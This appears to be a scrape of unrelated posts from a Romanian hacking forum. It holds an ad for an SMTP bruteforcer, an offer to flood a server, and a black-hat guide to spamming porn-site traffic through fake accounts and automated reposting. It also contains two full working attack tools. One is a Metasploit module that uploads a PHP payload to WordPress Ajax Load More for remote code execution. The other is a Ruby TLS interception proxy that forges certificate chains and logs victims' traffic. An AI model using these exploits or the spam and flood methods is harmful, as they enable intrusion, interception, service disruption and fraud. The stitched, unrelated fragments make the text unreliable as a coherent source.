iulik

@Jacksormwriter wants me dead pe twitter-ul lui.... R.I.P

SMTP bruter (scris in python) $25 PP / BTC . Mai multe detalii PM

Ai de plm ce oameni, cum sa dai reset ma la server, cine mortii lor se cred... Lasa-ne ip-ul serverului si ip-ul tau, pana maine ii dam flood de pica dedicatu din rack.

Daca mai stiti alte metode de trafic, puteti sa lasati in comentarii si le pun eu un post cu @Mention .

Lectura de seara, merci .

Upload-ul nu este cea mai buna metoda daca nu promovezi video-urile calumea, video-urile le promovezi pe forumuri (sa incerci sa nu arate a spam, gen mai postezi si alte chestii pe acele forumuri) sau poti sa spamezi jingling pe unele site-uri porn.

Mi-am amintit inca ceva, faceti cat mai multe bloguri tumblr

Metoda free: webhost si subdomeniu (puteti folosi domeniu daca aveti) de la easyxsites, pentru a converti traficul folosim plugrush si imagetwist. Metode de trafic: A) 000webhost + wordpress + wprobot + nextscripts configurat sa posteze pe vbulletin cate o poza cu href spre site-ul tau + poti folosi si tumblr si alte servicii (nu uita sa pui si hashtag-uri pentru alte servicii) Spam pe chat-ul de la imagefap (direct cu site-ul vostru sau urcati imagini cu watermark si le puneti pe chaturile lor), pentru mailuri folositi yopmail.com. C) Facebook fake account cu pizda buna, intrati pe grupuri pe facebook si pune-ti poze cu add me, strangeti multi prieteni / followeri si transformati cont-ul in pagina. D) Mai incercati metodele de mai sus. E) Cautati pe google "milf tumblr.com" (sau orice alt keyword) si faceti o lista cu site-urile gasite iar la sfarsit adaugati /rss (ex: muie.tumblr.com/rss) + faceti blog pe tumblr e.x: "milf next door" (fiti cat mai unici). Pasul urmator, cont pe https://ifttt.com/ si facem recipiente cu rss + tumblr si adaugam aici lista de rss-uri facute + punem hashtaguri care au acceasi legatura cu nisa, iar la descriere, desigur link la site-ul nostru. Links: https://www.plugrush.com/?ref=20013 (ref) easyXsites - Your Free Adult Host (non ref) ImageTwist - Free Image Hosting, Photo sharing & Earn Money (non ref) https://www.plugrush.com (non ref) Simplu si scurt, cautati pe google alte site-uri porn sa vedeti cum isi promoveaza alte persoane site-ul lor si faceti si voi acceasi chestie. Link-uri care te pot ajuta: http://www.blackhatworld.com/blackhat-seo/making-money/747458-methods-getting-targetted-visitors-your-adult-cpa-site-traffic-sources.html http://www.blackhatworld.com/blackhat-seo/making-money/801786-method-my-webcam-method-making-600-month.html

http://i.imgur.com/CbUVJ0F.png Facuti din traficul care nu il converteste plugrush

@albertynos pune pdf-ul ala

Salut, da, este adevarat, cu asta ne ocupam. Saltam hackerii care dau flood, noi suntem o subdivizie a SRI-ului numita "Futem lumea in gura".

tutorialevideo.info teapa, tutorialevideo.info frauda si tutorialevideo.info filme porno cu manguste sa incep acest comentariu pe care vreau sa il fac „super seo”.

Salut @dagisar !

Î?i ofer eu o mânu?? de ajutor, poate te ajut? The Death Triangle [Triunghiul Mor?ii], Produced by Oficiul Na?ional Cinematografic, Antena 1, Studioul Cinematografic Bucure?ti, CineTV Film, Filmex; directed by Sergiu Nicolaescu; screenplay by Sergiu Nicolaescu and Corneliu Vadim Tudor. 1999; c .

Nu prea stiu cum se face asta, poti incerca cu un plugin ( https://ro.wordpress.org/plugins/super-rss-reader ).

Scoate din rss embed-urile, sa nu te trezesti ca iti fura altu filmele

Download : GirlShare - Download doc & motzu hd.rar

@akarot la fel si mai sunt cativa, dar nu ii retin p.s: atunci cand faceti posturi despre cineva da-ti si voi mention..

JPMorgan Hack — Three Men Charged in Biggest Bank Hack in History - The Hacker News

Guvernul SUA a acuzat 3 hackeri, pentru cel mai mare caz de hacking in istoria financiar?. Cei 3 au fost acuza?i de hacking în mai multe institu?ii financiare, inclusiv JPMorgan Chase , potrivit oficialilor, a fost "cel mai mare furt de date de utilizator de la o institu?ie financiar? din SUA în istorie". JPMorgan Chase este una dintre cele mai mari b?nci din lume, care controleaz? activele totale în valoare de peste 2,59 trilioane de dolari. Hackerii au vizat 9 institu?ii financiare între 2012 ?i mijlocul anului 2015, inclusiv JPMorgan Chase ?i o publica?ie majora de ?tiri de afaceri. Bloomberg a raportat mar?i cei trei b?rbati, printre care Gery Shalon, Ziv Orenstein ?i Joshua Samuel Aaron au fost acuza?i de 23 de capete de acuzare (hacking, furt de identitate, fraudarea titlurilor de valoare, sp?lare de bani, ?.a.m.d). VIA

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress Ajax Load More PHP Upload Vulnerability', 'Description' => %q{ This module exploits an arbitrary file upload in the WordPress Ajax Load More version 2.8.1.1. It allows to upload arbitrary php files and get remote code execution. This module has been tested successfully on WordPress Ajax Load More 2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server. }, 'Author' => [ 'Unknown', # Identify yourself || send an PR here 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ ['WPVDB', '8209'] ], 'Privileged' => false, 'Platform' => 'php', 'Arch' => ARCH_PHP, 'Targets' => [['Ajax Load More 2.8.1.1', {}]], 'DisclosureDate' => 'Oct 10 2015', 'DefaultTarget' => 0 )) register_options( [ OptString.new('WP_USERNAME', [true, 'A valid username', nil]), OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil]) ], self.class ) end def check check_plugin_version_from_readme('ajax-load-more', '2.8.1.2') end def username datastore['WP_USERNAME'] end def password datastore['WP_PASSWORD'] end def get_nonce(cookie) res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), 'vars_get' => { 'page' => 'ajax-load-more-repeaters' }, 'cookie' => cookie ) if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/ return Regexp.last_match[1] else return nil end end def exploit vprint_status("#{peer} - Trying to login as #{username}") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil? vprint_status("#{peer} - Trying to get nonce") nonce = get_nonce(cookie) fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil? vprint_status("#{peer} - Trying to upload payload") # This must be default.php filename = 'default.php' print_status("#{peer} - Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), 'vars_post' => { 'action' => 'alm_save_repeater', 'value' => payload.encoded, 'repeater' => 'default', 'type' => 'default', 'alias' => '', 'nonce' => nonce }, 'cookie' => cookie ) if res if res.code == 200 && res.body.include?('Template Saved Successfully') register_files_for_cleanup(filename) else fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.") end else fail_with(Failure::Unknown, 'Server did not respond in an expected way') end print_status("#{peer} - Calling uploaded file") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename) ) end end

Foloseste https://ifttt.com/ , e gratis !

Tari random.

Researchers at Russian antivirus company Doctor Web have come across a new file-encrypting ransomware that appears to be targeting machines running Linux operating systems. The security firm believes tens of users have already fallen victim to the threat, which seems to be mainly aimed at webmasters whose machines host web servers. It’s unclear at this point how the malware is distributed and installed on victims’ computers, but experts noted that the threat requires administrator privileges in order to work. Once it infects a device, the ransomware, detected by Dr. Web as Linux.Encoder.1, downloads a couple of files containing the attacker's demands and one file containing a public RSA key that is used to store the AES keys for encrypting files, Dr. Web said. The malware, which is written in C and leverages the PolarSSL library, then launches itself as a daemon and deletes the original files. According to researchers, the malware encrypts files stored in the home and root directories, and folders related to web servers and website administration, including /var/lib/mysql, /var/www, /etc/nginx, /etc/apache, /var/log, public_html, www, webapp, backup, .git and .svn. Linux.Encoder.1 targets web development source code, documents, applications and media files. “To encrypt each file, the Trojan generates an AES key. After files are encrypted using AES-CBC-128, they are appended with the .encrypted extension. Into every directory that contains encrypted files, the Trojan plants a README_FOR_DECRYPT.txt file with a ransom demand,” Dr. Web explained. Once their files are encrypted, victims are asked to pay one Bitcoin (roughly $380 at today’s rate) to get them back. AES encryption has yet to be cracked, but Dr. Web says it’s investigating ways to recover files held hostage by this piece of ransomware. If the ransom is paid, the files are decrypted using a private RSA key that retrieves the AES key from encrypted files. While file-encrypting ransomware often uses encryption algorithms that are impossible to break, experts might be able to obtain the keys needed to recover the lost files. Kaspersky Lab recently announced that it had recovered all 14,000 decryption keys used by CoinVault and Bitcryptor ransomware. VIA (sa mute cineva postul la stiri va rog)

#!/usr/bin/env ruby # encoding: ASCII-8BIT # By Ramon de C Valle. This work is dedicated to the public domain. require 'openssl' require 'optparse' require 'socket' Version = [0, 0, 1] Release = nil class String def hexdump(stream=$stdout) 0.step(bytesize - 1, 16) do |i| stream.printf('%08x ', i) 0.upto(15) do |j| stream.printf(' ') if j == 8 if i + j >= bytesize stream.printf(' ') else stream.printf('%02x ', getbyte(i + j)) end end stream.printf(' ') 0.upto(15) do |j| if i + j >= bytesize stream.printf(' ') else if /[[:print:]]/ === getbyte(i + j).chr && /[^[:space:]]/ === getbyte(i + j).chr stream.printf('%c', getbyte(i + j)) else stream.printf('.') end end end stream.printf("\n") end end end options = {} OptionParser.new do |parser| parser.banner = "Usage: #{parser.program_name} [options] host cacert key cert" parser.separator('') parser.separator('Options:') parser.on('-H', '--local-host HOST', 'Local host') do |host| options[:local_host] = host end parser.on('-P', '--local-port PORT', 'Local port') do |port| options[:local_port] = port end parser.on('-d', '--debug', 'Debug mode') do options[:debug] = true end parser.on('-h', '--help', 'Show this message') do puts parser exit end parser.on('-o', '--output FILE', 'Output file') do |file| options[:file] = File.new(file, 'w+b') end parser.on('-p', '--port PORT', 'Port') do |port| options[:port] = port end parser.on('-v', '--verbose', 'Verbose mode') do options[:verbose] = true end parser.on('--pass-phrase PASS_PHRASE', 'Pass phrase for the key') do |pass_phrase| options[:pass_phrase] = pass_phrase end parser.on('--subject SUBJECT', 'Subject field for the fake certificate') do |subject| options[:subject] = subject end parser.on('--version', 'Show version') do puts parser.ver exit end end.parse! local_host = options[:local_host] || '0.0.0.0' local_port = options[:local_port] || 443 debug = options[:debug] || false file = options[:file] || nil host = ARGV[0] or fail ArgumentError, 'no host given' port = options[:port] || 443 verbose = options[:verbose] || false cacert = ARGV[1] or fail ArgumentError, 'no cacert given' key = ARGV[2] or fail ArgumentError, 'no key given' pass_phrase = options[:pass_phrase] || nil cert = ARGV[3] or fail ArgumentError, 'no cert given' subject = options[:subject] || "/C=US/ST=California/L=Mountain View/O=Example Inc/CN=#{host}" root_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA') root_ca_key = OpenSSL::PKey::RSA.new(2048) root_ca_cert = OpenSSL::X509::Certificate.new root_ca_cert.issuer = OpenSSL::X509::Name.parse('/C=US/O=Root Inc./CN=Root CA') root_ca_cert.not_after = Time.now + 86400 root_ca_cert.not_before = Time.now root_ca_cert.public_key = root_ca_key.public_key root_ca_cert.serial = 0 root_ca_cert.subject = root_ca_name root_ca_cert.version = 2 extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, root_ca_cert) root_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true)) root_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true)) root_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash')) root_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new) inter_ca_name = OpenSSL::X509::Name.parse('/C=US/O=Intermediate Inc./CN=Intermediate CA') inter_ca_key = OpenSSL::PKey::RSA.new(2048) inter_ca_cert = OpenSSL::X509::Certificate.new inter_ca_cert.issuer = root_ca_name inter_ca_cert.not_after = Time.now + 86400 inter_ca_cert.not_before = Time.now inter_ca_cert.public_key = inter_ca_key.public_key inter_ca_cert.serial = 0 inter_ca_cert.subject = inter_ca_name inter_ca_cert.version = 2 extension_factory = OpenSSL::X509::ExtensionFactory.new(root_ca_cert, inter_ca_cert) inter_ca_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:TRUE', true)) inter_ca_cert.add_extension(extension_factory.create_extension('keyUsage', 'keyCertSign,cRLSign', true)) inter_ca_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash')) inter_ca_cert.sign(root_ca_key, OpenSSL::Digest::SHA1.new) subinter_ca_cert = OpenSSL::X509::Certificate.new(File.read(cacert)) subinter_ca_cert.issuer = inter_ca_name subinter_ca_cert.sign(inter_ca_key, OpenSSL::Digest::SHA1.new) leaf_key = OpenSSL::PKey::RSA.new(File.read(key), pass_phrase) leaf_cert = OpenSSL::X509::Certificate.new(File.read(cert)) fake_name = OpenSSL::X509::Name.parse(subject) fake_key = OpenSSL::PKey::RSA.new(2048) fake_cert = OpenSSL::X509::Certificate.new fake_cert.issuer = leaf_cert.subject fake_cert.not_after = Time.now + 3600 fake_cert.not_before = Time.now fake_cert.public_key = fake_key.public_key fake_cert.serial = 0 fake_cert.subject = fake_name fake_cert.version = 2 extension_factory = OpenSSL::X509::ExtensionFactory.new(leaf_cert, fake_cert) fake_cert.add_extension(extension_factory.create_extension('basicConstraints', 'CA:FALSE', true)) fake_cert.add_extension(extension_factory.create_extension('keyUsage', 'digitalSignature,nonRepudiation,keyEncipherment')) fake_cert.add_extension(extension_factory.create_extension('subjectKeyIdentifier', 'hash')) fake_cert.sign(leaf_key, OpenSSL::Digest::SHA1.new) context = OpenSSL::SSL::SSLContext.new context.cert = fake_cert context.extra_chain_cert = [leaf_cert, subinter_ca_cert] context.key = fake_key tcp_server = TCPServer.new(local_host, local_port) proxy = OpenSSL::SSL::SSLServer.new(tcp_server, context) puts 'Listening on %s:%d' % [proxy.addr[2], proxy.addr[1]] if debug || verbose loop do Thread.start(proxy.accept) do |client| puts 'Accepted connection from %s:%d' % [client.peeraddr[2], client.peeraddr[1]] if debug || verbose context = OpenSSL::SSL::SSLContext.new(:TLSv1) context.verify_mode = OpenSSL::SSL::VERIFY_NONE tcp_socket = TCPSocket.new(host, port) server = OpenSSL::SSL::SSLSocket.new(tcp_socket, context) server.connect puts 'Connected to %s:%d' % [server.peeraddr[2], server.peeraddr[1]] if debug || verbose loop do readable, = IO.select([client, server]) readable.each do |r| data = r.readpartial(4096) data.hexdump($stderr) if debug puts '%d bytes received' % [data.bytesize] if debug || verbose if file file.write(data) file.flush file.fsync end case r when client count = server.write(data) server.flush data.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose when server count = client.write(data) client.flush data.hexdump($stderr) if debug puts '%d bytes sent' % [count] if debug || verbose end end end client.close server.close end end proxy.close